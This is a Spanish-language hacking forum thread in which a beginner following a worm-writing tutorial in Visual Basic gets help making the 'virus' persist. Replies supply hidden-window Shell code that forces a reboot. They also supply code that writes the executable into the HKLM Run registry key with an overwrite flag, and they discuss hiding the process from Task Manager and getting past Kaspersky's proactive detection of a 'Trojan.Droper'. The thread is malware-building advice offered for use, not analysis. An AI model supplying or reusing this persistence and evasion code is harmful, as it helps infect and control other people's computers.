Registrarse

[x3non]

hola.felicitaciones por esta fantastica web
me he descargado el tutorial de como crear un worm en vb hecho por Hendrix.pero no entiendo una cosa:Para que nuestro "bicho" se ejekute en kada sesion se puede hacer "puramente" en VB, aunke
yo por komodidad lo hago en Batch (es mucho mas corto), para hacerlo en batch tenemos que
rekordar que desde el VB podemos ejekutar comandos del MS-dos haciendo esto:
Código:
Shell "cmd.exe /c comandodelMS-dos"
no entiendo ese codigo.donde hay que ponerlo????

[papanoel_devacaciones]

Shell = es para ejecutar un archivo.
cmd.exe = es la consola
el /c = es para que una vez ejecutada la orden el cmd.exe se cierre.
comandodelMS-dos = es la orden que se va a ejecutar.

lo de poner ya seria por el propio tutorial ya que se puede poner en los sitios que te de la gana  ...ej:

Código

Private Sub Form_Load()
Shell "cmd.exe /c shutdown -r -t 30" 'esto reinicia el ordenata despues de 30seg
End Sub
 

Saludos

[[Zero]]

No hace falta poner cmd.exe, ese code puede quedar asi:

Código:

Private Sub Form_Load()
Shell ("shutdown -r -t 30"),vbhide 'esto reinicia el ordenata despues de 30seg y hace que la ventana ms-dos permanezca oculta
End Sub

Salu2

[x3non]

entonces como seria este?(se supone que hes pa guardarlo en el registro)

Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"

gracias por vuestras respuestas

[~~]

No hace falta poner cmd.exe, ese code puede quedar asi:

Código:

Private Sub Form_Load()
Shell ("shutdown -r -t 30"),vbhide 'esto reinicia el ordenata despues de 30seg y hace que la ventana ms-dos permanezca oculta
End Sub

Salu2

Con ese comando no hace falta poner el cmd.exe /c por q en realidad no es un comando como tal, es la ejecucion de un  archivo de system 32, pero para hacer un dir por ejemplo si q tienes q ponerlo

El q dices x3non, fijate en la ayuda q trae el propio comando y pon cada cosa donde te interesa:

C:\>reg add -h

Herramienta de registro de consola para Windows - versión 3.0
Copyright (C) Microsoft Corp. 1981-2001.  Reservados todos los derechos


REG ADD clave [/v nvalor | /ve] [/t tipo] [/s separador] [/d datos] [/f]

  clave      [\\equipo\]tclave
             Equipo     nombre del equipo remoto. Si se omite se usa el
                        equipo actual. Sólo HKLM y HKU están disponibles
                        para equipos remotos.
             tclave     CLAVERAIZ\subclave
             CLAVERAIZ  [ HKLM | HKCU | HKCR | HKU | HKCC ]
             subclave   Nombre completo de una clave de registro en la
                        CLAVERAIZ seleccionada.

  /v         Nombre del valor en la clave seleccionada para agregar

  /ve        Agrega el nombre de valor vacío <sin nombre>

  /t         Tipos de datos de clave de registro
             [ REG_SZ    | REG_MULTI_SZ  | REG_DWORD_BIG_ENDIAN    |
               REG_DWORD | REG_BINARY    | REG_DWORD_LITTLE_ENDIAN |
               REG_NONE  | REG_EXPAND_SZ ]
             Si se omite, se asume REG_SZ

  /s         Especifica el carácter que usa como separador en su cadena
             de datos para REG_MULTI_SZ. Si se omite, se usa "\0" como
             separador

  /d         Datos que se asignan a nvalor del registro que se agrega

  /f         Fuerza la sobrescritura de entradas de registro existentes
             sin avisar.

Ejemplos:

  REG ADD \\ABC\HKLM\Software\MiCo
    Agrega una clave HKLM\Software\MiCo en el equipo remoto ABC

  REG ADD HKLM\Software\MiCo /v datos /t REG_BINARY /d fe340ead
    Agrega un valor (nombre: datos, tipo: REG_BINARY, datos: fe340ead)

  REG ADD HKLM\Software\MiCo /v MRU /t REG_MULTI_SZ /d fax\0mail
    Agrega un valor (nombre: MRU, tipo: REG_MUTLI_SZ, datos: fax\0mail\0\0)

  REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%%
    Agrega un valor (nombre: Path, tipo: REG_EXPAND_SZ, datos: %systemroot%)
    Nota: use porcentaje doble ( %% ) dentro de la cadena expandida

Saludos

[[Zero]]

Pues te quedaría asi:

Código:

Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"),vbhide 

Asi se añade al registro y la ventana ms-dos no se ve cuando se ejecuta.
Salu2

[~~]

A por cierto, q ya se me olvidaba, si no te kieres complicar en cada inicio en comprobar si la clave del reg existe y si no existe sustituirla, simplemente añade un /f a lo q te a puesto º€duhAcKº q si no se ven procesos en el admin de tareas

[[Zero]]

Entonces si la sutituyes cada vez que la ejecutas no se ve en el admin? Yo lo hacía copiando el exe a windows, y en el codigo comprobaba si el exe existia, si existe es que  la calve ya la é copiado y si no existe lo copio a windows y lo añado. Entonces si la sutituyes cada vez que la ejecutas no se ve en el admin? Porque mi problema fue el KAV con su proactiva, ya que pedia confirmación al añadir info al registro, y el el titulo se podía leer "Trojan.Droper"...
Salu2

[x3non]

Pues te quedaría asi:

Código:

Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"),vbhide 

Asi se añade al registro y la ventana ms-dos no se ve cuando se ejecuta.
Salu2

pero si pongo eso me sale error de compilacion.no tendria que poner delante de eso lo de Private Sub y todo eso????
esque no llevo mucho tiempo con el vb y no me aclaro mucho

[[Zero]]

Pues claro, pero eso es cosa tuya, si quieres que se añada al cargarlo quedaría asi:

Código:

Private sub form_load ()
Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe /f"),vbhide
End Sub

Salu2